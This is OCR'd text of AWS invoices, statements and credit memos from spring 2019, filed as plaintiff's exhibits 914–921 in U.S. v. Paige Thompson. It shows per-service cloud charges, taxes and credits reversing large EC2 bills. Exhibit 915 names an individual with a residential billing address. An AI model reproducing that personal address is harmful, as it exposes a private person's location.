AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

39

Payer account number

8421



| AWS Backup | $1.46 |
|---|---|
| Charges | $1.46 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Container Service for Kubernetes | $144.00 |
| Charges | $144.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Redshift | $180.00 |
| Charges | $180.00 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $197.91 |
| Charges | $197.91 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic File System | $4.69 |
| Charges | $4.69 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon ElastiCache | $328.32 |
| Charges | $328.32 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Queue Service | $13.22 |
| Charges | $13.22 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

914–040

Payer account number

‹‹‹‹‹‹‹‹ 8421



## Summary for Linked Account

| Dakota Funds ‹‹‹‹‹‹7491) | $339.79 |
|---|---|
| Charges | $339.79 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Account ‹‹‹‹‹‹ 7491 total allocated for this invoice** | **$339.79** |

## Detail for Linked Account

| Amazon Simple Storage Service | $0.13 |
|---|---|
| Charges | $0.13 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.86 |
| Charges | $0.86 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $37.41 |
| Charges | $37.41 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic File System | $0.61 |
| Charges | $0.61 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $0.07 |
| Charges | $0.07 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $299.72 |
| Charges | $299.72 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $1.00 |
| Charges | $1.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

41

Payer account number

8421



| Amazon Simple Notification Service | $0.00 |
|---|---|
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

42

Payer account number

8421



| Summary for Linked Account | |
|---|---|
| Tradelt Prod            0246) | $94.85 |
| Charges | $94.85 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account            0246 total allocated for this invoice | $94.85 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $1.11 |
| Charges | $1.11 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.01 |
| Charges | $0.01 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $93.74 |
| Charges | $93.74 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

43

914–043

# EXHIBIT 915



Account number:
⬚7507

Bill to Address:
ATTN: NAVEEN CHAVA
VILLA NO 23 VASWANI WHISPERING PALM
MARTHAHALLI ORR
Bangalore, karnataka, 560037, IN

# Amazon Web Services Statement

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

### Statement Summary

| | |
|---|---|
| Statement Number: | ⬚8309 |
| Statement Date: | April 3 , 2019 |
| **TOTAL AMOUNT DUE** | **INR 1,214,001.76** |

## This Account Summary is for the billing period March 1 - March 31 , 2019

Greetings from Amazon Internet Services Private Ltd. We're writing to provide you with an account summary of your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

### Summary

| | |
|---|---|
| **AWS Service Charges** | **$17,553.22** |
| Charges | $14,875.61 |
| Credits | $0.00 |
| GST | $2,677.61 |
| Total for this statement in USD | $17,553.22 |
| **Total for this statement (1 USD = 69.161200 INR ) [1]** | **INR 1,214,001.76** |

[1] INR total calculated using a conversion rate of 69.161200 .

### Detail

| | |
|---|---|
| **Amazon Simple Storage Service** | **$0.00** |
| Charges | $0.00 |
| GST | $0.00 |
| **AWS Data Transfer** | **$0.09** |
| Charges | $0.08 |
| GST | $0.01 |
| **AmazonCloudWatch** | **$0.00** |
| Charges | $0.00 |
| GST | $0.00 |
| **Amazon Elastic File System** | **$0.00** |
| Charges | $0.00 |
| GST | $0.00 |

† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur. All charges and prices are in US Dollars
All AWS Services are sold by Amazon Internet Services Private Ltd.

Payment details:
In order to make the payment, please go to the Payment History page in Billing and Cost Management console.

Please note: this is not a GST Invoice.  To view your GST invoice, please go to the Bills page in Billing and Management Console

1

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 915
Admitted_____

| Amazon Elastic Compute Cloud | $17,553.13 |
|---|---|
| Charges | $14,875.53 |
| GST | $2,677.60 |
| Amazon DynamoDB | $0.00 |
| Charges | $0.00 |
| GST | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| GST | $0.00 |

† Usage and recurring charges for this statement period will be charged on
your next billing date. The amount of your actual charges for this statement
period may differ from the charges shown on this page. The charges shown
on this page do not include any additional usage charges accrued during this
statement period after the date you are viewing this page. Also, one-time fees
and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Internet Services Private Ltd.

**Payment details:**
In order to make the payment, please go to the Payment History page in Billing and
Cost Management console.

**Please note: this is not a GST Invoice.** To view your GST invoice, please go to the
Bills page in Billing and Management Console

2

# EXHIBIT 916



Account number: 7507

## Amazon Web Services Credit Memo

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

### Statement Summary

Bill to Address:
PowerSquare Inc.
ATTN: Pavan Pudipeddi
14401 American Kestral Drive
Austin, TX, 78738, US

| | |
|---|---|
| Statement Number: | 8061 |
| Statement Date: | April 20 , 2019 |
| Original Statement Number: | 8309 |
| **TOTAL AMOUNT** | **INR (1,210,278.12)** |

This credit memo was applied to invoice 8309 to close your payment obligation. Do not pay invoice number 8309. You do not need to take any action.

## This Account Summary is for the billing period March 1 - March 31 , 2019

Greetings from Amazon Internet Services Private Ltd. We're writing to provide you with an account summary of your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

| Summary | |
|---|---|
| AWS Service Charges | ($17,499.38) |
| Charges | ($14,829.98) |
| GST | ($2,669.40) |
| Total for this statement in USD | ($17,499.38) |
| Total for this statement (1 USD = 69.161200 INR ) [1] | INR (1,210,278.12) |

[1] INR total calculated using a conversion rate of 69.161200 .

| Detail | |
|---|---|
| Amazon Elastic Compute Cloud | ($17,499.38) |
| Start Date - 03/01/2019; End Date - 03/31/2019 | ($14,829.98) |
| Charges | ($14,829.98) |
| GST | ($2,669.40) |

† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur. All charges and prices are in US Dollars
All AWS Services are sold by Amazon Internet Services Private Ltd.

**Payment details:**
In order to make the payment, please go to the Payment History page in Billing and Cost Management console.

**Please note: this is not a GST Invoice.** To view your GST invoice, please go to the Bills page in Billing and Management Console

1

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 916
Admitted_____

# EXHIBIT 917



Account number:
_____7507

Bill to Address:
PowerSquare Inc.
ATTN: Pavan Pudipeddi
14401 American Kestral Drive
Austin, TX, 78738, US

# Amazon Web Services Statement
Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

## Statement Summary

| | |
|---|---|
| Statement Number: | 2621 |
| Statement Date: | May 3 , 2019 |
| **TOTAL AMOUNT DUE** | **INR 3,094.13** |

## This Account Summary is for the billing period April 1 - April 30 , 2019

Greetings from Amazon Internet Services Private Ltd. We're writing to provide you with an account summary of your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

### Summary

| | |
|---|---|
| AWS Service Charges | $44.19 |
| Charges | $1,712.67 |
| Credits | ($1,668.48) |
| GST | $0.00 |
| Total for this statement in USD | $44.19 |
| Total for this statement (1 USD = 70.018800 INR ) [1] | INR 3,094.13 |

[1] INR total calculated using a conversion rate of 70.018800 .

### Detail

| | |
|---|---|
| Amazon Simple Storage Service | $0.00 |
| Charges | $0.00 |
| GST | $0.00 |
| AWS Data Transfer | $0.04 |
| Charges | $0.04 |
| GST | $0.00 |
| AmazonCloudWatch | $0.00 |
| Charges | $0.00 |
| GST | $0.00 |
| Amazon Elastic File System | $0.00 |
| Charges | $0.00 |
| GST | $0.00 |

† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur. All charges and prices are in US Dollars
All AWS Services are sold by Amazon Internet Services Private Ltd.

**Payment details:**
In order to make the payment, please go to the Payment History page in Billing and Cost Management console.

Please note: this is not a GST Invoice.  To view your GST invoice, please go to the Bills page in Billing and Management Console

1

```
U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 917
Admitted_____
```

| Amazon Elastic Compute Cloud | $44.15 |
|---|---|
| Charges | $1,712.63 |
| Credits | ($1,668.48) |
| GST | $0.00 |
| **Amazon DynamoDB** | **$0.00** |
| Charges | $0.00 |
| GST | $0.00 |
| **Amazon Simple Notification Service** | **$0.00** |
| Charges | $0.00 |
| GST | $0.00 |

† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur. All charges and prices are in US Dollars
All AWS Services are sold by Amazon Internet Services Private Ltd.

**Payment details:**
In order to make the payment, please go to the Payment History page in Billing and Cost Management console.

**Please note: this is not a GST Invoice.** To view your GST invoice, please go to the Bills page in Billing and Management Console

2

# EXHIBIT 918



Account number: ▓▓▓▓4197

Bill to Address:
A T WORKS
ATTN: ATW payment agency service
6-10-1 Roppongi
Roppongi Hills Mori Tower 37F
Minato-ku , TOKYO , 106-6137 , JP

# Amazon Web Services, Inc. Invoice

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

## Invoice Summary

| | |
|---|---|
| Invoice Number: | ▓▓▓▓0777 |
| Invoice Date: | April 3 , 2019 |
| **TOTAL AMOUNT DUE ON April 3 , 2019** | **JPY 2,396,574** |

## This invoice is for the billing period March 1 - March 31 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

## Summary

| | |
|---|---|
| **AWS Service Charges** | **$21,301.10** |
| Charges | $19,723.25 |
| Credits | $0.00 |
| Tax * | $1,577.85 |
| Total for this invoice in USD | $21,301.10 |
| Total for this invoice (1 USD = 112.50940229910000 JPY ) | JPY 2,396,574* |

* You have elected for this invoice to be paid in a currency other than US Dollars. For more information regarding this feature please visit the Account Settings page in the Billing Console.

## Detail

| | |
|---|---|
| **Amazon Simple Storage Service** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| CT | $0.00 |
| **AWS Data Transfer** | **$395.88** |
| Charges | $366.56 |
| VAT ** | $0.00 |
| CT | $29.32 |
| **AmazonCloudWatch** | **$0.00** |
| Charges | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Service Provider:
(Not to be used for payment remittance)
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA  98109-5210 , US

1

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 918
Admitted_____

| | |
|---|---|
| VAT ** | $0.00 |
| CT | $0.00 |
| **Amazon Relational Database Service** | **$588.87** |
| Charges | $545.26 |
| VAT ** | $0.00 |
| CT | $43.61 |
| **Amazon Elastic Compute Cloud** | **$20,316.35** |
| Charges | $18,811.43 |
| VAT ** | $0.00 |
| CT | $1,504.92 |
| **AWS Key Management Service** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| CT | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Key Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Service Provider:
(Not to be used for payment remittance)
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA   98109-5210 , US

# EXHIBIT 919



Account number: _____4197

Bill to Address:
A T WORKS
ATTN: ATW payment agency service
6-10-1 Roppongi
Roppongi Hills Mori Tower 37F
Minato-ku , TOKYO , 106-6137 , JP

## Amazon Web Services, Inc. Credit Memo

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

### Invoice Summary

| | |
|---|---|
| Invoice Number: | ____1817 |
| Invoice Date: | April 24 , 2019 |
| Original Invoice Number: | ____0777 |
| **TOTAL AMOUNT** | **JPY (2,067,366)** |

This credit memo was applied to invoice ____0777 to close your payment obligation. Do not pay invoice number ____0777. You do not need to take any action.

## This invoice is for the billing period March 1 - March 31 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

### Summary

| | |
|---|---|
| **AWS Service Charges** | **($18,375.05)** |
| Charges | ($17,013.94) |
| Tax * | ($1,361.11) |
| Total for this invoice in USD | ($18,375.05) |
| Total for this invoice (1 USD = 112.50940229910000 JPY ) | JPY (2,067,366)* |

* You have elected for this invoice to be paid in a currency other than US Dollars. For more information regarding this feature please visit the Account Settings page in the Billing Console.

### Detail

| | |
|---|---|
| **Amazon Elastic Compute Cloud** | **($18,375.05)** |
| Charges | ($17,013.94) |
| VAT ** | $0.00 |
| CT | ($1,361.11) |
| **Start Date - 03/01/2019; End Date - 03/31/2019** | **($17,013.94)** |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Service Provider:
(Not to be used for payment remittance)
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA   98109-5210 , US

1

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 919
Admitted_____

# EXHIBIT 920



Account number: 4197

**Amazon Web Services, Inc. Invoice**

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

**Invoice Summary**

| | |
|---|---|
| Invoice Number: | 6697 |
| Invoice Date: | May 3 , 2019 |

**TOTAL AMOUNT DUE ON May 3 , 2019**   **JPY 307,572**

Bill to Address:
A T WORKS
ATTN: ATW payment agency service
6-10-1 Roppongi
Roppongi Hills Mori Tower 37F
Minato-ku , TOKYO , 106-6137 , JP

## This invoice is for the billing period April 1 - April 30 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

### Summary

| AWS Service Charges | $2,730.51 |
|---|---|
| Charges | $7,736.52 |
| Credits | ($5,208.27) |
| Tax * | $202.26 |
| Total for this invoice in USD | $2,730.51 |
| **Total for this invoice (1 USD = 112.64272522880000 JPY )** | **JPY 307,572*** |

* You have elected for this invoice to be paid in a currency other than US Dollars. For more information regarding this feature please visit the Account Settings page in the Billing Console.

### Detail

| Amazon Simple Storage Service | $0.00 |
|---|---|
| Charges | $0.00 |
| VAT ** | $0.00 |
| CT | $0.00 |
| **AWS Data Transfer** | **$427.32** |
| Charges | $395.67 |
| VAT ** | $0.00 |
| CT | $31.65 |
| **AmazonCloudWatch** | **$0.00** |
| Charges | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Service Provider:
(Not to be used for payment remittance)
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA   98109-5210 , US

1

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 920
Admitted_____

| | |
|---|---|
| VAT ** | $0.00 |
| CT | $0.00 |
| **Amazon Relational Database Service** | **$421.46** |
| Charges | $390.24 |
| VAT ** | $0.00 |
| CT | $31.22 |
| **Amazon Elastic Compute Cloud** | **$1,881.73** |
| Charges | $6,950.61 |
| Credits | ($5,208.27) |
| VAT ** | $0.00 |
| CT | $139.39 |
| **AWS Key Management Service** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| CT | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Service Provider:
(Not to be used for payment remittance)
Amazon Web Services, Inc.
410 Terry Ave North
Seattle , WA   98109-5210 , US

2

# EXHIBIT 921



Account number:
_____6068

Bill to Address:
HP Inc
ATTN: Benita Fairbairn
HP Inc, Call Box 42000
Aguadilla , PR , 00605 , PR

# Amazon Web Services, Inc. Invoice

Email or talk to us about your AWS account or bill, visit aws.amazon.com/contact-us/

## Invoice Summary

| | |
|---|---|
| Invoice Number: | _____4725 |
| | *Please include this invoice number with your payment* |
| Invoice Date: | May 3 , 2019 |
| PO Number: | HPI3102351 |
| **TOTAL AMOUNT DUE ON June 2 , 2019** | **$573,703.66** |

## This invoice is for the billing period April 1 - April 30 , 2019

Greetings from Amazon Web Services, we're writing to provide you with an electronic invoice for your use of AWS services. Additional information about your bill, individual service charge details, and your account history are available on the Account Activity Page.

| Summary | |
|---|---|
| **AWS Service Charges** | **$573,703.66** |
| Charges | $573,419.88 |
| Credits | ($9.80) |
| Tax * | $292.97 |
| Government Fees and Taxes, Other Fees and Monthly Charges (Telecommunications) | $0.61 |
| **Total for this invoice** | **$573,703.66** |

| Detail for Consolidated Bill | |
|---|---|
| **AWS Transfer for SFTP** | **$580.79** |
| Charges | $580.79 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Secrets Manager** | **$417.15** |
| Charges | $417.15 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.

** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: _____0227
ABA Routing Number: _____0248
Wire Routing Number: _____0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

1

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 921
Admitted_____

| | |
|---|---|
| CT | $0.00 |
| **Amazon SimpleDB** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon QuickSight** | **$242.16** |
| Charges | $242.16 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon CloudSearch** | **$44.98** |
| Charges | $44.98 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS IoT** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Translate** | **$0.00** |
| Charges | $0.00 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Direct Connect** | **$65.85** |
| Charges | $65.85 |
| VAT ** | $0.00 |
| GST | $0.00 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number: _____0227
ABA Routing Number: _____0248
Wire Routing Number: _____0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

2

| | |
|---|---|
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Neptune** | **$2,530.58** |
| Charges | $2,530.58 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Redshift** | **$17,530.57** |
| Charges | $17,530.57 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AmazonCloudWatch** | **$11,040.59** |
| Charges | $11,040.57 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.02 |
| CT | $0.00 |
| **AWS RoboMaker** | **$0.00** |
| Charges | $4.29 |
| Credits | ($4.29) |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Athena** | **$1,263.10** |
| Charges | $1,263.10 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Database Migration Service** | **$1,041.51** |
| Charges | $1,041.51 |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type
† Usage and recurring charges for this statement period will be charged on your next billing date. The amount of your actual charges for this statement period may differ from the charges shown on this page. The charges shown on this page do not include any additional usage charges accrued during this statement period after the date you are viewing this page. Also, one-time fees and subscription charges are assessed separately, on the date that they occur.
All charges and prices are in US Dollars
All AWS Services are sold by Amazon Web Services, Inc.

Electronic funds transfer details:
Bank Name: Wells Fargo NA
Account Name: Amazon Web Services, Inc.
Bank Address:
420 Montgomery Street
San Francisco CA 94163
Checking Account Number:       0227
ABA Routing Number:       0248
Wire Routing Number:       0248
SWIFT Code: WFBIUS6SXXX

or Mail payment to:
Amazon Web Services, Inc.
PO BOX 84023
Seattle, WA 98124-8423, US

3

921-003

| | |
|---|---:|
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon Lex** | **$0.22** |
| Charges | $0.22 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon GuardDuty** | **$275.58** |
| Charges | $275.58 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon SageMaker** | **$137.36** |
| Charges | $137.36 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS Directory Service** | **$168.52** |
| Charges | $168.52 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **Amazon EC2 Container Service** | **$518.30** |
| Charges | $518.30 |
| VAT ** | $0.00 |
| GST | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| CT | $0.00 |
| **AWS X-Ray** | **$0.91** |

* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
